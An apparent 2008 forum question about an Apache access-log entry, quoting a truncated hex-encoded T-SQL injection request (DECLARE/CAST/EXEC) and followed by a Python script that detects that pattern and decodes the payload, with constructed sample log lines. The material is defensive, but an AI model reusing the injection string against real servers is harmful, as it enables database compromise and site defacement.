08.24.2008 at 02:37AM PDT, ID: 23673445
Is this an attempt at SQL/Javascript injection attack on Apache

Asked by grahamnonweiler in Apache Web Server, Networking Security Vulnerabilities


Starting 3 days ago I have begun seeing an entry in the Apache access logs on a couple of our production servers (we have over 70). These are not consistent in origin, and also not consistent in their destination (meaning we host many clients' websites on different servers in different physical locations).

The extract looks like embedded Javascript - although it could be an attempt at a .NET injection.

==== Log Extract ====


NN.NNN.59.132 - - [24/Aug/2008:00:00:23 +0000] "GET /thsite_nshw.php
?mwi=319;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204[...]%20AS%20
CHAR(4000));EXEC(@S); HTTP/1.1" 200 24680 "-" "Mozilla/4.0 (compati
ble; MSIE 7.0; Windows NT 5.1)" "VisitorID=212919310816014230"

======== END of EXTRACT =======

I have split the actual log line (obviously) here and also removed the origination IP address (which isn't relevant as it is not consistent).

The only part of the URI that is valid is the script name and the passed variable "mwi" and its numeric value. The remainder of the URI is what I believe to be the injection attack.

If anyone here has seen/experienced similar entries in their log files I would be interested to hear what your findings were, and similarly if anyone knows what it is that would be even better!
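
A triage helper for the log pattern quoted in the question, as an added example that is not part of the original post: it URL-decodes each request, flags the `DECLARE ... CAST(0x...) ... EXEC(@S)` shape, and hex-decodes the CAST argument so the hidden statement can be read without executing it. The sample log lines, client addresses, `/page.php` path and the harmless `SELECT 1` payload are constructed; the third line reuses only the hex prefix visible in the extract above.

```python
import re
from urllib.parse import unquote

# Request field and status of an Apache access-log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/\d\.\d" (?P<status>\d{3})')
# T-SQL shape from the extract: CAST(0x<hex> AS CHAR(n)) ... EXEC(@var)
CAST_RE = re.compile(r"CAST\s*\(\s*0x(?P<hex>[0-9A-Fa-f]*)\s+AS\s+N?(?:VAR)?CHAR", re.I)
EXEC_RE = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)

def inspect_line(line):
    """Return a finding dict for a hex-encoded T-SQL injection attempt, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = unquote(m.group("uri")).partition("?")
    cast = CAST_RE.search(query)
    if not (cast and EXEC_RE.search(query)):
        return None
    hexstr = cast.group("hex")
    hexstr = hexstr[: len(hexstr) - len(hexstr) % 2]  # tolerate a truncated last nibble
    return {
        "client": line.split(" ", 1)[0],
        "path": path,
        "status": int(m.group("status")),  # 200 = page served, not proof the SQL ran
        "decoded_sql": bytes.fromhex(hexstr).decode("latin-1"),
    }

def scan(lines):
    """Return findings for every log line that matches the pattern."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (documentation IP range, harmless payload "SELECT 1").
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2008:00:00:23 +0000] "GET /page.php?id=319;DECLARE%20@S%20'
    'CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" '
    '200 24680 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [24/Aug/2008:00:01:02 +0000] "GET /page.php?id=319 HTTP/1.1" 200 512 "-" "-"',
    # Only the hex prefix visible in the question's extract (the rest is cut off there).
    '192.0.2.12 - - [24/Aug/2008:00:02:10 +0000] "GET /page.php?id=1;SET%20@S=CAST('
    '0x4445434C415245204%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 100 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows only that the request was received; whether the statement ran depends on whether the target script concatenates the parameter into a SQL Server query.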
About this solution

Zones: Apache Web Server, Networking Security Vulnerabilities
Tags: Apache, HTTP, 2.2, Multiple production servers, SQL or Javascript Injection Attack
Solution Provided By: jahboite
Participating Experts: 4
Solution Grade: A
 
 